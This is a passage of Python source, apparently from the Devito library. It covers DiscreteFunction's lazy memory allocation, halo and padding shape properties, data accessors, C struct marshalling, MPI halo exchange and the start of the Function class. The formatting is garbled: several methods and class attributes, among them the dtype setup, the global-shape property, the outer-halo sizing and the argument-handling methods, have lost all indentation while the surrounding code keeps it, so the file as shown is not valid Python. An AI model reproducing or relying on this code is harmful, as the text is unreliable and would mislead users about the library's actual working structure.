        # Identity-based hash, consistent with the identity-based __eq__
        return id(self)
    # Symbolic substitution is delegated to Differentiable
    _subs = Differentiable._subs
    def _allocate_memory(func):
        """
        Decorator for data accessors: lazily allocate the underlying Data
        object upon first access, then run the wrapped accessor.
        """
        @wraps(func)
        def wrapper(self):
            if self._data is None:
                debug("Allocating memory for %s%s" % (self.name, self.shape_allocated))
                # Clear up both SymPy and Devito caches to drop unreachable data
                CacheManager.clear(force=False)
                # Allocate the actual data object
                self._data = self._DataType(self.shape_allocated, self.dtype,
                                            modulo=self._mask_modulo,
                                            allocator=self._allocator,
                                            distributor=self._distributor)
                # Initialize data
                if self._first_touch:
                    assign(self, 0)
                if callable(self._initializer):
                    if self._first_touch:
                        warning("`first touch` together with `initializer` causing "
                                "redundant data initialization")
                    try:
                        self._initializer(self.data_with_halo)
                    except ValueError:
                        # Perhaps user only wants to initialise the physical domain
                        self._initializer(self.data)
                else:
                    self.data_with_halo.fill(0)
            return func(self)
        return wrapper
@classmethod
def __dtype_setup__(cls, **kwargs):
grid = kwargs.get('grid')
dtype = kwargs.get('dtype')
if dtype is not None:
return dtype
elif grid is not None:
return grid.dtype
else:
return np.float32
    def __staggered_setup__(self, **kwargs):
        """
        Setup staggering-related metadata.
        Returns the user-supplied `staggered` value, except that the CELL
        marker is expanded into the full set of dimensions (i.e., staggering
        along every dimension).
        """
        staggered = kwargs.get('staggered', None)
        if staggered is CELL:
            staggered = self.dimensions
        return staggered
    def __distributor_setup__(self, **kwargs):
        grid = kwargs.get('grid')
        # There may or may not be a `Distributor`. In the latter case, the
        # DiscreteFunction is to be considered "local" to each MPI rank
        return kwargs.get('distributor') if grid is None else grid.distributor
    @cached_property
    def _functions(self):
        # The set of DiscreteFunctions this object is built upon: just itself
        return {self.function}
    @property
    def _data_buffer(self):
        """
        Reference to the data. Unlike :attr:`data` and :attr:`data_with_halo`,
        this *never* returns a view of the data. This method is for internal use only.
        """
        return self._data_allocated
    @property
    def _data_alignment(self):
        # Memory alignment guaranteed by the underlying allocator
        return self._allocator.guaranteed_alignment
    @property
    def _mem_external(self):
        # NOTE(review): flag presumably means the memory is managed outside
        # the generated operator code -- confirm against AbstractFunction
        return True
    @property
    def grid(self):
        """The Grid on which the discretization occurred."""
        return self._grid
    @property
    def staggered(self):
        # Staggering metadata, as produced by `__staggered_setup__`
        return self._staggered
    @property
    def coefficients(self):
        """Form of the coefficients of the function."""
        return self._coefficients
    @cached_property
    def _coeff_symbol(self):
        # Placeholder symbol for user-supplied finite-difference weights
        if self.coefficients == 'symbolic':
            return sympy.Function('W')
        else:
            raise ValueError("Function was not declared with symbolic "
                             "coefficients.")
    @cached_property
    def shape(self):
        """
        Shape of the domain region. The domain constitutes the area of the
        data written to by an Operator.
        Notes
        -----
        In an MPI context, this is the *local* domain region shape.
        """
        return self._shape
    @cached_property
    def shape_domain(self):
        """
        Shape of the domain region. The domain constitutes the area of the
        data written to by an Operator.
        Notes
        -----
        In an MPI context, this is the *local* domain region shape.
        Alias to ``self.shape``.
        """
        return self.shape
    @cached_property
    def shape_with_halo(self):
        """
        Shape of the domain+outhalo region. The outhalo is the region
        surrounding the domain that may be read by an Operator.
        Notes
        -----
        In an MPI context, this is the *local* with_halo region shape.
        Further, note that the outhalo of inner ranks is typically empty, while
        the outhalo of boundary ranks contains a number of elements depending
        on the rank position in the decomposed grid (corner, side, ...).
        """
        # Per dimension: left outhalo + domain size + right outhalo
        return tuple(j + i + k for i, (j, k) in zip(self.shape, self._size_outhalo))
    _shape_with_outhalo = shape_with_halo
    @cached_property
    def _shape_with_inhalo(self):
        """
        Shape of the domain+inhalo region. The inhalo region comprises the
        outhalo as well as any additional "ghost" layers for MPI halo
        exchanges. Data in the inhalo region are exchanged when running
        Operators to maintain consistent values as in sequential runs.
        Notes
        -----
        Typically, this property won't be used in user code, but it may come
        in handy for testing or debugging
        """
        return tuple(j + i + k for i, (j, k) in zip(self.shape, self._halo))
    @cached_property
    def shape_allocated(self):
        """
        Shape of the allocated data. It includes the domain and inhalo regions,
        as well as any additional padding surrounding the halo.
        Notes
        -----
        In an MPI context, this is the *local* with_halo region shape.
        """
        # Per dimension: left padding + inhalo size + right padding
        return DimensionTuple(*[j + i + k for i, (j, k) in zip(self._shape_with_inhalo,
                                                               self._padding)],
                              getters=self.dimensions)
@cached_property
def shape_global(self):
"""
Global shape of the domain region. The domain constitutes the area of
the data written to by an Operator.
Notes
-----
In an MPI context, this is the *global* domain region shape, which is
therefore identical on all MPI ranks.
"""
if self.grid is None:
return self.shape
retval = []
for d, s in zip(self.dimensions, self.shape):
size = self.grid.dimension_map.get(d)
retval.append(size.glb if size is not None else s)
return tuple(retval)
    @property
    def size_global(self):
        """
        The global number of elements this object is expected to store in memory.
        Note that this would need to be combined with self.dtype to give the actual
        size in bytes.
        """
        return reduce(mul, self.shape_global)
    # The "inhalo" offsets/sizes coincide with the base AbstractFunction halo
    _offset_inhalo = AbstractFunction._offset_halo
    _size_inhalo = AbstractFunction._size_halo
@cached_property
def _size_outhalo(self):
"""Number of points in the outer halo region."""
if self._distributor is None:
# Computational domain is not distributed and hence the outhalo
# and inhalo correspond
return self._size_inhalo
left = [abs(min(i.loc_abs_min-i.glb_min-j, 0)) if i and not i.loc_empty else 0
for i, j in zip(self._decomposition, self._size_inhalo.left)]
right = [max(i.loc_abs_max+j-i.glb_max, 0) if i and not i.loc_empty else 0
for i, j in zip(self._decomposition, self._size_inhalo.right)]
sizes = tuple(Size(i, j) for i, j in zip(left, right))
if self._distributor.is_parallel and (any(left) > 0 or any(right)) > 0:
try:
warning_msg = """A space order of {0} and a halo size of {1} has been
set but the current rank ({2}) has a domain size of
only {3}""".format(self._space_order,
max(self._size_inhalo),
self._distributor.myrank,
min(self.grid.shape_local))
if not self._distributor.is_boundary_rank:
warning(warning_msg)
else:
left_dist = [i for i, d in zip(left, self.dimensions) if d
in self._distributor.dimensions]
right_dist = [i for i, d in zip(right, self.dimensions) if d
in self._distributor.dimensions]
for i, j, k, l in zip(left_dist, right_dist,
self._distributor.mycoords,
self._distributor.topology):
if l > 1 and ((j > 0 and k == 0) or (i > 0 and k == l-1)):
warning(warning_msg)
break
except AttributeError:
pass
return DimensionTuple(*sizes, getters=self.dimensions, left=left, right=right)
    @property
    def size_allocated(self):
        """
        The number of elements this object is expected to store in memory.
        Note that this would need to be combined with self.dtype to give the actual
        size in bytes.
        """
        return reduce(mul, self.shape_allocated)
    @cached_property
    def _mask_modulo(self):
        """Boolean mask telling which Dimensions support modulo-indexing."""
        # Only stepping (time-buffered) Dimensions wrap around
        return tuple(True if i.is_Stepping else False for i in self.dimensions)
    @cached_property
    def _mask_domain(self):
        """Slice-based mask to access the domain region of the allocated data."""
        return tuple(slice(i, j) for i, j in
                     zip(self._offset_domain, self._offset_halo.right))
    @cached_property
    def _mask_inhalo(self):
        """Slice-based mask to access the domain+inhalo region of the allocated data."""
        return tuple(slice(i.left, i.right + j.right) for i, j in
                     zip(self._offset_inhalo, self._size_inhalo))
    @cached_property
    def _mask_outhalo(self):
        """Slice-based mask to access the domain+outhalo region of the allocated data."""
        # `i.stop and ... or None` falls back to an open-ended slice when the
        # domain slice's stop is falsy (0/None)
        return tuple(slice(i.start - j.left, i.stop and i.stop + j.right or None)
                     for i, j in zip(self._mask_domain, self._size_outhalo))
    @cached_property
    def _decomposition(self):
        """
        Tuple of Decomposition objects, representing the domain decomposition.
        None is used as a placeholder for non-decomposed Dimensions.
        """
        if self._distributor is None:
            return (None,)*self.ndim
        mapper = {d: self._distributor.decomposition[d] for d in self._dist_dimensions}
        return tuple(mapper.get(d) for d in self.dimensions)
    @cached_property
    def _decomposition_outhalo(self):
        """
        Tuple of Decomposition objects, representing the domain+outhalo
        decomposition. None is used as a placeholder for non-decomposed Dimensions.
        """
        if self._distributor is None:
            return (None,)*self.ndim
        # Extend each Decomposition to also cover the inhalo extremes
        return tuple(v.reshape(*self._size_inhalo[d]) if v is not None else v
                     for d, v in zip(self.dimensions, self._decomposition))
    @property
    def data(self):
        """
        The domain data values, as a numpy.ndarray.
        Elements are stored in row-major format.
        Notes
        -----
        With this accessor you are claiming that you will modify the values you
        get back. If you only need to look at the values, use :meth:`data_ro`
        instead.
        """
        return self.data_domain
    def data_gather(self, start=None, stop=None, step=1, rank=0):
        """
        Gather distributed `Data` attached to a `Function` onto a single rank.
        Parameters
        ----------
        start : int or tuple of ints
            The `slice` start in each dimension.
        stop : int or tuple of ints
            The final point of the `slice` to include.
        step : int or tuple of ints
            The `slice` step in each dimension.
        rank : int
            The rank onto which the data will be gathered.
        Notes
        -----
        Alias to ``self.data._gather``.
        Note that gathering data from large simulations onto a single rank may
        result in memory blow-up and hence should use this method judiciously.
        """
        return self.data._gather(start=start, stop=stop, step=step, rank=rank)
    @property
    @_allocate_memory
    def data_domain(self):
        """
        The domain data values.
        Elements are stored in row-major format.
        Notes
        -----
        Alias to ``self.data``.
        With this accessor you are claiming that you will modify the values you
        get back. If you only need to look at the values, use
        :meth:`data_ro_domain` instead.
        """
        # The caller may write through the returned view
        self._is_halo_dirty = True
        return self._data._global(self._mask_domain, self._decomposition)
    @property
    @_allocate_memory
    def data_with_halo(self):
        """
        The domain+outhalo data values.
        Elements are stored in row-major format.
        Notes
        -----
        With this accessor you are claiming that you will modify the values you
        get back. If you only need to look at the values, use
        :meth:`data_ro_with_halo` instead.
        """
        self._is_halo_dirty = True
        # Refresh the halo before exposing it to the caller
        self._halo_exchange()
        return self._data._global(self._mask_outhalo, self._decomposition_outhalo)
    _data_with_outhalo = data_with_halo
    @property
    @_allocate_memory
    def _data_with_inhalo(self):
        """
        The domain+inhalo data values.
        Elements are stored in row-major format.
        Notes
        -----
        This accessor does *not* support global indexing.
        With this accessor you are claiming that you will modify the values you
        get back. If you only need to look at the values, use
        :meth:`data_ro_with_inhalo` instead.
        Typically, this accessor won't be used in user code to set or read data
        values. Instead, it may come in handy for testing or debugging
        """
        self._is_halo_dirty = True
        self._halo_exchange()
        return np.asarray(self._data[self._mask_inhalo])
    @property
    @_allocate_memory
    def _data_allocated(self):
        """
        The allocated data values, that is domain+inhalo+padding.
        Elements are stored in row-major format.
        Notes
        -----
        This accessor does *not* support global indexing.
        With this accessor you are claiming that you will modify the values you
        get back. If you only need to look at the values, use
        :meth:`data_ro_allocated` instead.
        Typically, this accessor won't be used in user code to set or read data
        values. Instead, it may come in handy for testing or debugging
        """
        self._is_halo_dirty = True
        self._halo_exchange()
        return np.asarray(self._data)
    def _data_in_region(self, region, dim, side):
        """
        The data values in a given region.
        Parameters
        ----------
        region : DataRegion
            The data region of interest (e.g., OWNED, HALO) for which a view
            is produced.
        dim : Dimension
            The dimension of interest.
        side : DataSide
            The side of interest (LEFT, RIGHT).
        Notes
        -----
        This accessor does *not* support global indexing.
        With this accessor you are claiming that you will modify the values you
        get back.
        Typically, this accessor won't be used in user code to set or read
        data values.
        """
        self._is_halo_dirty = True
        offset = getattr(getattr(self, '_offset_%s' % region.name)[dim], side.name)
        size = getattr(getattr(self, '_size_%s' % region.name)[dim], side.name)
        # Along `dim`, take only the requested region; along all other
        # dimensions, take the full (unpadded) extent
        index_array = [
            slice(offset, offset+size) if d is dim else slice(pl, s - pr)
            for d, s, (pl, pr)
            in zip(self.dimensions, self.shape_allocated, self._padding)
        ]
        return np.asarray(self._data[index_array])
    @property
    @_allocate_memory
    def data_ro_domain(self):
        """Read-only view of the domain data values."""
        view = self._data._global(self._mask_domain, self._decomposition)
        # Prevent accidental writes through the returned view
        view.setflags(write=False)
        return view
    @property
    @_allocate_memory
    def data_ro_with_halo(self):
        """Read-only view of the domain+outhalo data values."""
        view = self._data._global(self._mask_outhalo, self._decomposition_outhalo)
        view.setflags(write=False)
        return view
    _data_ro_with_outhalo = data_ro_with_halo
    @property
    @_allocate_memory
    def _data_ro_with_inhalo(self):
        """
        Read-only view of the domain+inhalo data values.
        Notes
        -----
        This accessor does *not* support global indexing.
        """
        view = self._data[self._mask_inhalo]
        view.setflags(write=False)
        return np.asarray(view)
    @property
    @_allocate_memory
    def _data_ro_allocated(self):
        """
        Read-only view of the domain+inhalo+padding data values.
        Notes
        -----
        This accessor does *not* support global indexing.
        """
        view = self._data
        view.setflags(write=False)
        return np.asarray(view)
    @cached_property
    def local_indices(self):
        """
        Tuple of slices representing the global indices that logically
        belong to the calling MPI rank.
        Notes
        -----
        Given a Function ``f(x, y)`` with shape ``(nx, ny)``, when *not* using
        MPI this property will return ``(slice(0, nx), slice(0, ny))``. On
        the other hand, when MPI is used, the local ranges depend on the domain
        decomposition, which is carried by ``self.grid``.
        """
        if self._distributor is None:
            return tuple(slice(0, s) for s in self.shape)
        else:
            return tuple(self._distributor.glb_slices.get(d, slice(0, s))
                         for s, d in zip(self.shape, self.dimensions))
    @cached_property
    def space_dimensions(self):
        """Tuple of Dimensions defining the physical space."""
        return tuple(d for d in self.dimensions if d.is_Space)
    @cached_property
    def _dist_dimensions(self):
        """Tuple of MPI-distributed Dimensions."""
        if self._distributor is None:
            return ()
        return tuple(d for d in self.dimensions if d in self._distributor.dimensions)
    @property
    def initializer(self):
        # If data is already allocated, expose it (halo included) instead of
        # the original initializer; NOTE(review): presumably so that rebuilds
        # and pickling capture the current values -- confirm
        if self._data is not None:
            return self.data_with_halo.view(np.ndarray)
        else:
            return self._initializer
_C_structname = 'dataobj'
_C_typename = 'struct %s *' % _C_structname
_C_field_data = 'data'
_C_field_size = 'size'
_C_field_nopad_size = 'npsize'
_C_field_domain_size = 'dsize'
_C_field_halo_size = 'hsize'
_C_field_halo_ofs = 'hofs'
_C_field_owned_ofs = 'oofs'
_C_typedecl = Struct(_C_structname,
[Value('%srestrict' % ctypes_to_cstr(c_void_p), _C_field_data),
Value(ctypes_to_cstr(POINTER(c_int)), _C_field_size),
Value(ctypes_to_cstr(POINTER(c_int)), _C_field_nopad_size),
Value(ctypes_to_cstr(POINTER(c_int)), _C_field_domain_size),
Value(ctypes_to_cstr(POINTER(c_int)), _C_field_halo_size),
Value(ctypes_to_cstr(POINTER(c_int)), _C_field_halo_ofs),
Value(ctypes_to_cstr(POINTER(c_int)), _C_field_owned_ofs)])
_C_ctype = POINTER(type(_C_structname, (Structure,),
{'_fields_': [(_C_field_data, c_void_p),
(_C_field_size, POINTER(c_int)),
(_C_field_nopad_size, POINTER(c_int)),
(_C_field_domain_size, POINTER(c_int)),
(_C_field_halo_size, POINTER(c_int)),
(_C_field_halo_ofs, POINTER(c_int)),
(_C_field_owned_ofs, POINTER(c_int))]}))
    def _C_make_dataobj(self, data):
        """
        A ctypes object representing the DiscreteFunction that can be passed to
        an Operator.
        """
        dataobj = byref(self._C_ctype._type_())
        dataobj._obj.data = data.ctypes.data_as(c_void_p)
        dataobj._obj.size = (c_int*self.ndim)(*data.shape)
        # MPI-related fields
        dataobj._obj.npsize = (c_int*self.ndim)(*[i - sum(j) for i, j in
                                                  zip(data.shape, self._size_padding)])
        dataobj._obj.dsize = (c_int*self.ndim)(*self._size_domain)
        dataobj._obj.hsize = (c_int*(self.ndim*2))(*flatten(self._size_halo))
        dataobj._obj.hofs = (c_int*(self.ndim*2))(*flatten(self._offset_halo))
        dataobj._obj.oofs = (c_int*(self.ndim*2))(*flatten(self._offset_owned))
        # stash a reference to the array on _obj, so we don't let it get freed
        # while we hold onto _obj
        dataobj._obj.underlying_array = data
        return dataobj
    def _C_as_ndarray(self, dataobj):
        """Cast the data carried by a DiscreteFunction dataobj to an ndarray."""
        # Rebuild a zero-copy ndarray view over the struct's raw data pointer
        shape = tuple(dataobj._obj.size[i] for i in range(self.ndim))
        ctype_1d = dtype_to_ctype(self.dtype) * int(reduce(mul, shape))
        buf = cast(dataobj._obj.data, POINTER(ctype_1d)).contents
        return np.frombuffer(buf, dtype=self.dtype).reshape(shape)
@memoized_meth
def _C_make_index(self, dim, side=None):
# Depends on how fields are populated in `_C_make_dataobj`
idx = self.dimensions.index(dim)
if side is not None:
idx = idx*2 + (0 if side is LEFT else 1)
return idx
    @memoized_meth
    def _C_get_field(self, region, dim, side=None):
        """
        Symbolic representation of a given data region.
        Returns a RegionMeta carrying the (offset, size) of `region` along
        `dim`, expressed as accesses into the C-level dataobj struct.
        """
        ffp = lambda f, i: FieldFromPointer("%s[%d]" % (f, i), self._C_symbol)
        if region is DOMAIN:
            offset = ffp(self._C_field_owned_ofs, self._C_make_index(dim, LEFT))
            size = ffp(self._C_field_domain_size, self._C_make_index(dim))
        elif region is OWNED:
            if side is LEFT:
                offset = ffp(self._C_field_owned_ofs, self._C_make_index(dim, LEFT))
                size = ffp(self._C_field_halo_size, self._C_make_index(dim, RIGHT))
            elif side is CENTER:
                # Note: identical to region=HALO, side=CENTER
                offset = ffp(self._C_field_owned_ofs, self._C_make_index(dim, LEFT))
                size = ffp(self._C_field_domain_size, self._C_make_index(dim))
            else:
                offset = ffp(self._C_field_owned_ofs, self._C_make_index(dim, RIGHT))
                size = ffp(self._C_field_halo_size, self._C_make_index(dim, LEFT))
        elif region is HALO:
            if side is LEFT:
                offset = ffp(self._C_field_halo_ofs, self._C_make_index(dim, LEFT))
                size = ffp(self._C_field_halo_size, self._C_make_index(dim, LEFT))
            elif side is CENTER:
                # Note: identical to region=OWNED, side=CENTER
                offset = ffp(self._C_field_owned_ofs, self._C_make_index(dim, LEFT))
                size = ffp(self._C_field_domain_size, self._C_make_index(dim))
            else:
                offset = ffp(self._C_field_halo_ofs, self._C_make_index(dim, RIGHT))
                size = ffp(self._C_field_halo_size, self._C_make_index(dim, RIGHT))
        elif region is NOPAD:
            offset = ffp(self._C_field_halo_ofs, self._C_make_index(dim, LEFT))
            size = ffp(self._C_field_nopad_size, self._C_make_index(dim))
        elif region is FULL:
            offset = 0
            size = ffp(self._C_field_size, self._C_make_index(dim))
        else:
            raise ValueError("Unknown region `%s`" % str(region))
        return RegionMeta(offset, size)
    def _halo_exchange(self):
        """
        Perform the halo exchange with the neighboring processes.

        For each distributed Dimension and each side (LEFT, RIGHT), the OWNED
        boundary data is sent to the neighbor on that side while the HALO
        region on the opposite side is filled with data received from the
        corresponding neighbor. No-op when running without MPI (or on a
        single rank).
        """
        if not MPI.Is_initialized() or MPI.COMM_WORLD.size == 1:
            # Nothing to do
            return
        if MPI.COMM_WORLD.size > 1 and self._distributor is None:
            raise RuntimeError("`%s` cannot perform a halo exchange as it has "
                               "no Grid attached" % self.name)

        neighborhood = self._distributor.neighborhood
        comm = self._distributor.comm

        for d in self._dist_dimensions:
            for i in [LEFT, RIGHT]:
                # Get involved peers
                dest = neighborhood[d][i]
                source = neighborhood[d][i.flip()]

                # Gather send data; a contiguous copy is required by MPI
                data = self._data_in_region(OWNED, d, i)
                sendbuf = np.ascontiguousarray(data)

                # Setup recv buffer
                shape = self._data_in_region(HALO, d, i.flip()).shape
                recvbuf = np.ndarray(shape=shape, dtype=self.dtype)

                # Communication (combined send+recv avoids deadlock between ranks)
                comm.Sendrecv(sendbuf, dest=dest, recvbuf=recvbuf, source=source)

                # Scatter received data; skip when there is no neighbor on that side
                if recvbuf is not None and source != MPI.PROC_NULL:
                    self._data_in_region(HALO, d, i.flip())[:] = recvbuf

        self._is_halo_dirty = False
@property
def _arg_names(self):
"""Tuple of argument names introduced by this function."""
return (self.name,)
def _arg_defaults(self, alias=None):
"""
A map of default argument values defined by this symbol.
Parameters
----------
alias : DiscreteFunction, optional
To bind the argument values to different names.
"""
key = alias or self
args = ReducerMap({key.name: self._data_buffer})
# Collect default dimension arguments from all indices
for i, s in zip(key.dimensions, self.shape):
args.update(i._arg_defaults(_min=0, size=s))
return args
def _arg_values(self, **kwargs):
"""
A map of argument values after evaluating user input. If no
user input is provided, return a default value.
Parameters
----------
**kwargs
Dictionary of user-provided argument overrides.
"""
# Add value override for own data if it is provided, otherwise
# use defaults
if self.name in kwargs:
new = kwargs.pop(self.name)
if isinstance(new, DiscreteFunction):
# Set new values and re-derive defaults
values = new._arg_defaults(alias=self).reduce_all()
else:
# We've been provided a pure-data replacement (array)
values = {self.name: new}
# Add value overrides for all associated dimensions
for i, s in zip(self.dimensions, new.shape):
size = s - sum(self._size_nodomain[i])
values.update(i._arg_defaults(size=size))
else:
values = self._arg_defaults(alias=self).reduce_all()
return values
def _arg_check(self, args, intervals):
"""
Check that ``args`` contains legal runtime values bound to ``self``.
Raises
------
InvalidArgument
If, given the runtime values ``args``, an out-of-bounds array
access would be performed, or if shape/dtype don't match with
self's shape/dtype.
"""
if self.name not in args:
raise InvalidArgument("No runtime value for `%s`" % self.name)
key = args[self.name]
if len(key.shape) != self.ndim:
raise InvalidArgument("Shape %s of runtime value `%s` does not match "
"dimensions %s" %
(key.shape, self.name, self.dimensions))
if key.dtype != self.dtype:
warning("Data type %s of runtime value `%s` does not match the "
"Function data type %s" % (key.dtype, self.name, self.dtype))
for i, s in zip(self.dimensions, key.shape):
i._arg_check(args, s, intervals[i])
def _arg_finalize(self, args, alias=None):
key = alias or self
return {key.name: self._C_make_dataobj(args[key.name])}
# Pickling support
_pickle_kwargs = AbstractFunction._pickle_kwargs +\
['grid', 'staggered', 'initializer']
class Function(DiscreteFunction):

    """
    Tensor symbol representing a discrete function in symbolic equations.

    A Function carries multi-dimensional data and provides operations to create
    finite-differences approximations.

    A Function encapsulates space-varying data; for data that also varies in time,
    use TimeFunction instead.

    Parameters
    ----------
    name : str
        Name of the symbol.
    grid : Grid, optional
        Carries shape, dimensions, and dtype of the Function. When grid is not
        provided, shape and dimensions must be given. For MPI execution, a
        Grid is compulsory.
    space_order : int or 3-tuple of ints, optional
        Discretisation order for space derivatives. Defaults to 1. ``space_order`` also
        impacts the number of points available around a generic point of interest. By
        default, ``space_order`` points are available on both sides of a generic point of
        interest, including those nearby the grid boundary. Sometimes, fewer points
        suffice; in other scenarios, more points are necessary. In such cases, instead of
        an integer, one can pass a 3-tuple ``(o, lp, rp)`` indicating the discretization
        order (``o``) as well as the number of points on the left (``lp``) and right
        (``rp``) sides of a generic point of interest.
    shape : tuple of ints, optional
        Shape of the domain region in grid points. Only necessary if ``grid`` isn't given.
    dimensions : tuple of Dimension, optional
        Dimensions associated with the object. Only necessary if ``grid`` isn't given.
    dtype : data-type, optional
        Any object that can be interpreted as a numpy data type. Defaults
        to ``np.float32``.
    staggered : Dimension or tuple of Dimension or Stagger, optional
        Define how the Function is staggered.
    initializer : callable or any object exposing the buffer interface, optional
        Data initializer. If a callable is provided, data is allocated lazily.
    allocator : MemoryAllocator, optional
        Controller for memory allocation. To be used, for example, when one wants
        to take advantage of the memory hierarchy in a NUMA architecture. Refer to
        `default_allocator.__doc__` for more information.
    padding : int or tuple of ints, optional
        .. deprecated:: shouldn't be used; padding is now automatically inserted.
        Allocate extra grid points to maximize data access alignment. When a tuple
        of ints, one int per Dimension should be provided.

    Examples
    --------
    Creation

    >>> from devito import Grid, Function
    >>> grid = Grid(shape=(4, 4))
    >>> f = Function(name='f', grid=grid)
    >>> f
    f(x, y)
    >>> g = Function(name='g', grid=grid, space_order=2)
    >>> g
    g(x, y)

    First-order derivatives through centered finite-difference approximations

    >>> f.dx
    Derivative(f(x, y), x)
    >>> f.dy
    Derivative(f(x, y), y)
    >>> g.dx
    Derivative(g(x, y), x)
    >>> (f + g).dx
    Derivative(f(x, y) + g(x, y), x)

    First-order derivatives through left/right finite-difference approximations

    >>> f.dxl
    Derivative(f(x, y), x)

    Note that the fact that it's a left-derivative isn't captured in the representation.
    However, upon derivative expansion, this becomes clear

    >>> f.dxl.evaluate
    f(x, y)/h_x - f(x - h_x, y)/h_x
    >>> f.dxr
    Derivative(f(x, y), x)

    Second-order derivative through centered finite-difference approximation

    >>> g.dx2
    Derivative(g(x, y), (x, 2))

    Notes
    -----
    The parameters must always be given as keyword arguments, since SymPy
    uses ``*args`` to (re-)create the dimension arguments of the symbolic object.
    """

    is_Function = True

    def _cache_meta(self):
        # Attach additional metadata to self's cache entry
        return {'nbytes': self.size}

    def __init_finalize__(self, *args, **kwargs):
        super(Function, self).__init_finalize__(*args, **kwargs)

        # Space order
        space_order = kwargs.get('space_order', 1)
        if isinstance(space_order, int):
            self._space_order = space_order
        elif isinstance(space_order, tuple) and len(space_order) == 3:
            # `(order, left_points, right_points)`: only the order is retained
            # here; the asymmetric halo extent is handled by `__halo_setup__`
            self._space_order, _, _ = space_order
        else:
            raise TypeError("`space_order` must be int or 3-tuple of ints")

        # Dynamically attach the derivative short-cuts (e.g. `.dx`, `.dy2`)
        self._fd = self.__fd_setup__()

        # Flag whether it is a parameter or a variable.
        # Used at operator evaluation to evaluate the Function at the
        # variable location (i.e. if the variable is staggered in x the
        # parameter has to be computed at x + hx/2)
        self._is_parameter = kwargs.get('parameter', False)

    def __fd_setup__(self):
        """
        Dynamically add derivative short-cuts.
        """
        return generate_fd_shortcuts(self.dimensions, self.space_order)

    @cached_property
    def _fd_priority(self):
        # Priority used to choose the evaluation point when mixing staggered
        # and non-staggered Functions in one expression
        return 1 if self.staggered in [NODE, None] else 2

    @property
    def is_parameter(self):
        # True if this Function plays the role of a (physical) parameter,
        # rather than a problem variable
        return self._is_parameter

    def _eval_at(self, func):
        # Re-index a parameter Function at the staggered location of `func`;
        # non-parameters, or already-matching staggering, are left untouched
        if not self.is_parameter or self.staggered == func.staggered:
            return self
        mapper = {self.indices_ref[d]: func.indices_ref[d]
                  for d in self.dimensions
                  if self.indices_ref[d] is not func.indices_ref[d]}
        if mapper:
            return self.subs(mapper)
        return self

    @classmethod
    def __indices_setup__(cls, **kwargs):
        grid = kwargs.get('grid')
        dimensions = kwargs.get('dimensions')
        if grid is None:
            if dimensions is None:
                raise TypeError("Need either `grid` or `dimensions`")
        elif dimensions is None:
            dimensions = grid.dimensions

        # Staggered indices
        staggered = kwargs.get("staggered", None)
        if staggered in [CELL, NODE]:
            staggered_indices = dimensions
        else:
            # Shift each staggered Dimension by (a multiple of) half a grid spacing
            mapper = {d: d for d in dimensions}
            for s in as_tuple(staggered):
                c, s = s.as_coeff_Mul()
                mapper.update({s: s + c * s.spacing/2})
            staggered_indices = mapper.values()
        return tuple(dimensions), tuple(staggered_indices)

    @property
    def is_Staggered(self):
        return self.staggered is not None

    @classmethod
    def __shape_setup__(cls, **kwargs):
        grid = kwargs.get('grid')
        dimensions = kwargs.get('dimensions')
        shape = kwargs.get('shape', kwargs.get('shape_global'))
        if grid is None:
            if shape is None:
                raise TypeError("Need either `grid` or `shape`")
        elif shape is None:
            if dimensions is not None and dimensions != grid.dimensions:
                raise TypeError("Need `shape` as not all `dimensions` are in `grid`")
            # With MPI, each rank gets its local portion of the decomposed domain
            shape = grid.shape_local
        elif dimensions is None:
            raise TypeError("`dimensions` required if both `grid` and "
                            "`shape` are provided")
        else:
            # Got `grid`, `dimensions`, and `shape`. We sanity-check that the
            # Dimensions in `dimensions` also appearing in `grid` have same size
            # (given by `shape`) as that provided in `grid`
            if len(shape) != len(dimensions):
                raise ValueError("`shape` and `dimensions` must have the "
                                 "same number of entries")
            loc_shape = []
            for d, s in zip(dimensions, shape):
                if d in grid.dimensions:
                    size = grid.dimension_map[d]
                    if size.glb != s and s is not None:
                        raise ValueError("Dimension `%s` is given size `%d`, "
                                         "while `grid` says `%s` has size `%d` "
                                         % (d, s, d, size.glb))
                    else:
                        loc_shape.append(size.loc)
                else:
                    loc_shape.append(s)
            shape = tuple(loc_shape)
        return shape

    def __halo_setup__(self, **kwargs):
        halo = kwargs.get('halo')
        if halo is not None:
            return halo
        else:
            space_order = kwargs.get('space_order', 1)
            if isinstance(space_order, int):
                halo = (space_order, space_order)
            elif isinstance(space_order, tuple) and len(space_order) == 3:
                # Asymmetric halo: `(order, left_points, right_points)`
                _, left_points, right_points = space_order
                halo = (left_points, right_points)
            else:
                raise TypeError("`space_order` must be int or 3-tuple of ints")
            # Only space Dimensions get a halo
            return tuple(halo if i.is_Space else (0, 0) for i in self.dimensions)

    def __padding_setup__(self, **kwargs):
        padding = kwargs.get('padding')
        if padding is None:
            if kwargs.get('autopadding', configuration['autopadding']):
                # Auto-padding
                # 0-padding in all Dimensions except in the Fastest Varying Dimension,
                # `fvd`, which is the innermost one
                padding = [(0, 0) for i in self.dimensions[:-1]]
                fvd = self.dimensions[-1]
                # Let UB be a function that rounds up a value `x` to the nearest
                # multiple of the SIMD vector length, `vl`
                vl = configuration['platform'].simd_items_per_reg(self.dtype)
                ub = lambda x: int(ceil(x / vl)) * vl
                # Given the HALO and DOMAIN sizes, the right-PADDING is such that:
                # * the `fvd` size is a multiple of `vl`
                # * it contains *at least* `vl` points
                # This way:
                # * all first grid points along the `fvd` will be cache-aligned
                # * there is enough room to round up the loop trip counts to maximize
                #   the effectiveness SIMD vectorization
                fvd_pad_size = (ub(self._size_nopad[fvd]) - self._size_nopad[fvd]) + vl
                padding.append((0, fvd_pad_size))
                return tuple(padding)
            else:
                return tuple((0, 0) for d in self.dimensions)
        elif isinstance(padding, int):
            # Legacy: a scalar pads the right side of the space Dimensions only
            return tuple((0, padding) if d.is_Space else (0, 0) for d in self.dimensions)
        elif isinstance(padding, tuple) and len(padding) == self.ndim:
            # Legacy: an int entry means right-side padding only
            return tuple((0, i) if isinstance(i, int) else i for i in padding)
        else:
            raise TypeError("`padding` must be int or %d-tuple of ints" % self.ndim)

    @property
    def space_order(self):
        """The space order."""
        return self._space_order

    def sum(self, p=None, dims=None):
        """
        Generate a symbolic expression computing the sum of ``p`` points
        along the spatial dimensions ``dims``.

        Parameters
        ----------
        p : int, optional
            The number of summands. Defaults to the halo size.
        dims : tuple of Dimension, optional
            The Dimensions along which the sum is computed. Defaults to
            ``self``'s spatial dimensions.
        """
        points = []
        for d in (as_tuple(dims) or self.space_dimensions):
            if p is None:
                lp = self._size_inhalo[d].left
